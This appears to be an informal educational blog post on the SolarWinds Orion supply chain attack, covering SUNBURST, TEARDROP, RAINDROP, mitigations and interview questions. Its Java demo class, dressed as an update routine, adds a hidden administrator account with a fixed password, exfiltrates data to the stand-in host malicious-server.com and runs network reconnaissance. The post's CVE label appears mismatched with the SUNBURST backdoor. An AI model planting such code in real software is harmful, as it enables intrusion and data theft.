SolarWinds Hack (CVE-2020-10148)

The SolarWinds hack, discovered in December 2020, was a massive supply chain attack that compromised the Orion software platform, used for IT performance monitoring.

What Happened?

The breach, attributed to a sophisticated group of cyber attackers believed to be state-sponsored, affected numerous government agencies and private sector companies. The attackers inserted malicious code into the Orion software updates, which, when installed by users, created a backdoor for further exploitation.

Exploit Process

Discovery and Announcement: The breach was uncovered by the cybersecurity firm FireEye, which found that its own systems had been compromised. Further investigation revealed that the source of the breach was the Orion software from SolarWinds.

Infection and Spread: The attackers gained initial access to SolarWinds' systems and injected malicious code (SUNBURST) into the Orion software updates. When customers installed the updates, the malware created a backdoor in their systems.

Remote Code Execution: Through this backdoor, the attackers could access and exfiltrate data, move laterally across networks, and deploy additional malware such as TEARDROP and RAINDROP to achieve their objectives.

TEARDROP

What is it? TEARDROP is a secondary malware payload that was used to deliver the Cobalt Strike Beacon, a penetration testing tool often repurposed by attackers.

How does it work?

1. Deployment: Once SUNBURST established communication with the attackers, it could deploy TEARDROP onto the affected systems.

2. Functionality: TEARDROP executed the Cobalt Strike Beacon, which allowed the attackers to perform various tasks such as lateral movement, data exfiltration, and further exploitation of the network.

TEARDROP

Detailed Functionality:

• Code Injection: TEARDROP typically utilizes process injection to hide its presence. It injects the Cobalt Strike Beacon into memory of legitimate processes to evade detection by security tools.

• Cobalt Strike Beacon: Once deployed, the Cobalt Strike Beacon can:

  • Command and Control (C2): Communicate with C2 servers for instructions.

  • Lateral Movement: Exploit vulnerabilities to move laterally across the network.

  • Privilege Escalation: Attempt to gain higher-level privileges on compromised systems.

  • Credential Dumping: Extract user credentials from memory.

  • Data Exfiltration: Collect and send sensitive data back to the attackers.

  • Persistence Mechanisms: Ensure long-term access by installing backdoors or altering system configurations.

Technical Details:

• File Dropping: Often dropped as a .dll file, masquerading as a legitimate Windows service.

• Obfuscation Techniques: Utilizes encryption and obfuscation to hide its payload and evade detection.

RAINDROP

Detailed Functionality:

• Fileless Malware: Similar to TEARDROP, RAINDROP operates in memory to reduce its footprint on the disk, making it harder to detect.

• Cobalt Strike Beacon Execution: Once deployed, it executes the Cobalt Strike Beacon, allowing the attackers to maintain control over the compromised systems.

• Adaptive Deployment: RAINDROP is deployed selectively, indicating its use in targeted attacks where specific high-value systems are identified for further exploitation.

Technical Details:

• Loader Mechanism: RAINDROP acts as a loader, decrypting and executing the payload directly in memory.

• Stealth Techniques: Uses various stealth techniques such as API hooking and direct system calls to avoid triggering security alerts.

Advanced Tactics and Techniques

• Initial Access via SUNBURST: The attackers used the SUNBURST backdoor to establish an initial foothold. This was achieved by injecting malicious code into the SolarWinds Orion software updates, ensuring widespread distribution.

• C2 Communication: Both TEARDROP and RAINDROP rely on sophisticated C2 communication protocols to receive instructions. These communications are often encrypted and use legitimate cloud services to blend in with normal traffic.

• Network Reconnaissance: After deploying the Beacons, the attackers conduct extensive reconnaissance to map out the network, identify key systems, and plan further attacks.

• Use of Legitimate Tools: The attackers often use legitimate system administration tools to perform malicious activities, further reducing the likelihood of detection.

Code Example

Yall wanna see some dirtyy code haha?

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.Base64;
import java.util.logging.Level;
import java.util.logging.Logger;

public class SolarWindsUpdate {
    private static final Logger logger = Logger.getLogger(SolarWindsUpdate.class.getName());

    public void applyUpdate() {
        // Legitimate update code
        System.out.println("Updating software...");
        logger.log(Level.INFO, "Software update started.");

        // Malicious payload
        if (isCompromised()) {
            executeMaliciousCode();
        }

        // Continue with legitimate update process
        completeUpdate();
    }

    private boolean isCompromised() {
        // Logic to determine if the system should execute malicious code
        return true; // Always true for demonstration
    }

    private void executeMaliciousCode() {
        // Malicious actions such as data exfiltration or backdoor creation
        System.out.println("Executing malicious payload...");
        logger.log(Level.WARNING, "Malicious payload execution initiated.");

        // Backdoor creation
        createBackdoor();

        // Data exfiltration
        exfiltrateData();

        // Network reconnaissance
        performNetworkRecon();
    }

    private void createBackdoor() {
        try {
            Runtime.getRuntime().exec("cmd.exe /c net user backdoor P@ssw0rd123 /add");
            Runtime.getRuntime().exec("cmd.exe /c net localgroup administrators backdoor /add");
            logger.log(Level.INFO, "Backdoor user created.");
        } catch (Exception e) {
            logger.log(Level.SEVERE, "Failed to create backdoor.", e);
        }
    }

    private void exfiltrateData() {
        try {
            String data = "Sensitive Data to Exfiltrate";
            String encodedData = Base64.getEncoder().encodeToString(data.getBytes());
            URL url = new URL("http://malicious-server.com/exfiltrate?data=" + encodedData);
            HttpURLConnection connection = (HttpURLConnection) url.openConnection();
            connection.setRequestMethod("GET");
            connection.getResponseCode();
            logger.log(Level.INFO, "Data exfiltrated successfully.");
        } catch (Exception e) {
            logger.log(Level.SEVERE, "Data exfiltration failed.", e);
        }
    }

    private void performNetworkRecon() {
        try {
            Process process = Runtime.getRuntime().exec("cmd.exe /c ipconfig /all");
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line); // Log or send the network info somewhere
            }
            logger.log(Level.INFO, "Network reconnaissance completed.");
        } catch (Exception e) {
            logger.log(Level.SEVERE, "Network reconnaissance failed.", e);
        }
    }

    private void completeUpdate() {
        // Legitimate update completion logic
        System.out.println("Update complete.");
        logger.log(Level.INFO, "Software update completed successfully.");
    }

    public static void main(String[] args) {
        SolarWindsUpdate updater = new SolarWindsUpdate();
        updater.applyUpdate();
    }
}

This class mimics a legitimate update process but includes a malicious payload that creates a backdoor user, exfiltrates data, and performs network reconnaissance.

What Systems Does It Affect?

The SolarWinds attack impacted approximately 18,000 customers who had installed the compromised Orion updates. This included a range of industries such as government agencies, healthcare providers, technology firms, and financial institutions.

What Does the Payload Do? The payload delivered through the SolarWinds hack allowed attackers to:

• Gain persistent access to the compromised systems.

• Move laterally within networks to access sensitive data.

• Exfiltrate data and communications.

• Install additional malware to further their goals.

Mitigation Steps

1. Isolate and Investigate:

   • Immediately isolate affected systems to prevent further spread.

   • Conduct a thorough investigation to identify the scope of the breach and affected systems.

2. Update and Patch:

   • Apply patches and updates provided by SolarWinds to mitigate the vulnerability.

   • Ensure all systems are running the latest, non-compromised versions of software.

3. Enhance Monitoring and Detection:

   • Increase monitoring of network traffic and system logs for signs of malicious activity.

   • Implement advanced threat detection tools to identify potential indicators of compromise.

4. Change Credentials and Access Controls:

   • Change passwords and credentials that may have been exposed during the breach.

   • Review and tighten access controls to limit the risk of unauthorized access.

Interview Questions

What is the most effective way to ensure the security of third-party software components in your organization's supply chain?

In the context of incident response, what types of activities best prepares an organization to handle sophisticated cyber attacks like the SolarWinds hack?

What key lesson from the SolarWinds hack can be applied to enhance an organization’s cybersecurity strategy? Cheers Guys, Hope yall enjoyed this sharing!

References: https://nvd.nist.gov/vuln/detail/CVE-2020-10148

https://symantec-enterprise-blogs.security.com/threat-intelligence/solarwinds-raindrop-malware https://cloud.google.com/blog/topics/threat-intelligence/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor/